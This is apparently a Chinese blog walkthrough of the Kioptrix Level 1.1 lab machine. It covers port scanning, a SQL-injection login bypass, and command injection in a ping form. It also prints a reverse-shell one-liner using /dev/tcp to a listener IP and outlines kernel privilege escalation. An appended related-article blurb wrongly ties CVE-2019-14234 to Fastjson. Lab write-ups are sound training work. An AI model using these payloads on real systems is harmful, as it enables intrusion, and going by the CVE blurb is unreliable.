Vulhub靶场-KIOPTRIX: LEVEL 1.1

目录

环境配置

端口扫描

漏送发现

漏送利用

提权(内核漏洞提权)


环境配置

环境配置的过程同主页该专栏第一个靶场,不在赘述。

端口扫描

首先通过arp-scan并根据靶机的mac地址确定靶机的IP地址

然后对靶机进行一个扫描

首先扫描到OpenSSH 3.9p1 (protocol 1.99),这个是什么意思呢?

Openssh是一个使用ssh协议进行通信的软件,3.9p1是他的版本号,后面的ptotocol表示openssh所支持的ssh版本1和版本2.

Apache就不用多说了,中间件嘛

111端口的rpcbind服务是rpc服务的守护进程,也就是服务端,而2应该是他的版本,#100000表示rpc程序服务编号为100000。

623端口开放的服务为status,这个跟NFS协议有关,status是NFS RPC服务的一部分(而NFS协议,客户端和服务端之间的通信是通过RPC协议来进行的。),如果开放了这个服务的话可以看一下有没有NFS协议,如果有的话可以看一下存不存在NFS共享信息泄露。这里不存在。

631端口开放的ipp是一种允许计算机通过网络进行打印的协议,而CUPS是一个用于管理打印任务的软件系统,1.1是版本号,

3306的mysql就不用多说了,数据库。

漏洞发现

由于这里发现nmap扫描到MySQL存在未授权登录,尝试登录一下,提示我的IP不能登录,判断应该靶机设置的只能本机登录。

利用hydra爆破一下ssh和mysql,当然也是不行的(预料之中)

根据nmap扫到的

利用dirsearch进行一下目录扫描

在扫描目录之前也通过nmap得到的版本号,通过searchsploit进行历史漏洞的搜寻,无果。

访问一下扫描到的manual/index.html,好像没有什么用处

由于靶机开启了http服务,直接访问,可以看到是一个登录框,遇到这里一般可以测一下爆破和注入。因为我们是需要拿权限,所以这里XSS之类的就不测了。

漏洞利用

直接用最常用的万能密码尝试绕过登录验证,直接就绕过了。

账号:root ' or '1' = '1

密码:root ' or '1' = '1

bp抓一下包,在框里填什么,它都会去帮你ping,那明显就可以利用管道符让他帮我们执行命令(感觉这里跟CTF比较像)

这里尝试读取密码,读取不成功,考虑到对某些命令进行了过滤,于是我尝试了很多中下载命令,但是都不行,base64编码和url编码也是不行,于是尝试在kali上面利用python开启http服务,在这里利用wget去下载后门,也是不行。(这里感谢飞哥指正,post请求体里面不可以有空格,有空格的话就不是一部分了。)

索性用插件生成一个反弹shell的命令,然后直接反弹。

这里执行命令

127.0.0.1 | bash -c 'exec bash -i &>/dev/tcp/192.168.253.145/6666 <&1'

提前监听6666端口,也是成功的反弹了shell,权限是低权限,尝试提权。

提权(内核漏洞提权)

首先查看一下linux内核版本,以及操作系统是什么发行版,搜集一下信息。

内核版本是2.6.9,发行版是centos4.5

根据内核版本去搜一下漏洞,类型为本地的就一个,但是版本也不符合

地址:Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

通过发型版本去搜一下,刚好有一个提权漏洞。版本符合。先将POC下载到本地,然后在kali上开启http服务,在靶机上下载下来。

Python起http服务

这里在有两个问题,因为在打靶机的时候使用了bp,默认监听8080端口,那使用python开启http服务时默认也是8080端口,会提示启动不了。可以换个端口(这里感谢飞哥指正,python开启的http服务默认是8000,只要保证端口不占用即可。)

第二个就是在下载C文件时会提示没有权限写入,然后不断换目录去下载,一直不行,最后到tmp目录下载成功。

这里tmp目录可以写入是因为他是存放临时文件的目录,一般所有用户都可以读取和写入。

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
CVE-2019-14234是指vulhub靶场中的一个漏洞。这个漏洞是由于vulhub中的一个名为Fastjson的组件的安全缺陷引起的。Fastjson是一种广泛使用的Java JSON库,用于在Java应用程序中进行JSON转换。然而,Fastjson在处理特殊构造的JSON字符串时存在漏洞,攻击者可以利用这个漏洞执行任意的Java代码。 在CVE-2019-14234中,攻击者可以通过构造特定的JSON字符串并发送给受影响的应用程序来利用该漏洞。当应用程序使用Fastjson解析并处理该字符串时,恶意的Java代码将被执行。攻击者可以利用这个漏洞来执行远程代码,从而导致敏感信息泄露、服务器被入侵等危害。 为了防止CVE-2019-14234的攻击,可以采取多种措施。首先,更新vulhub中的Fastjson组件到最新版本,以获得最新的安全修复。其次,在编码和处理JSON数据时,应谨慎处理不受信任的输入。可以使用输入验证和过滤来确保传入的数据是符合预期的,并且不包含恶意的代码。 此外,安全审计和漏洞扫描工具也可以用于检测和修复CVE-2019-14234漏洞。通过定期扫描应用程序,可以及时发现和修复潜在的安全问题。最后,加强网络安全意识教育,提高开发人员和用户对网络安全的认识和理解,从而进一步提高防范和应对漏洞攻击的能力。 综上所述,CVE-2019-14234是vulhub靶场中的一个Fastjson组件漏洞,可以被攻击者利用来执行任意的Java代码。修复这个漏洞的方法包括更新Fastjson组件、输入验证和过滤、安全审计和漏洞扫描以及加强网络安全意识教育。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaopeisec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值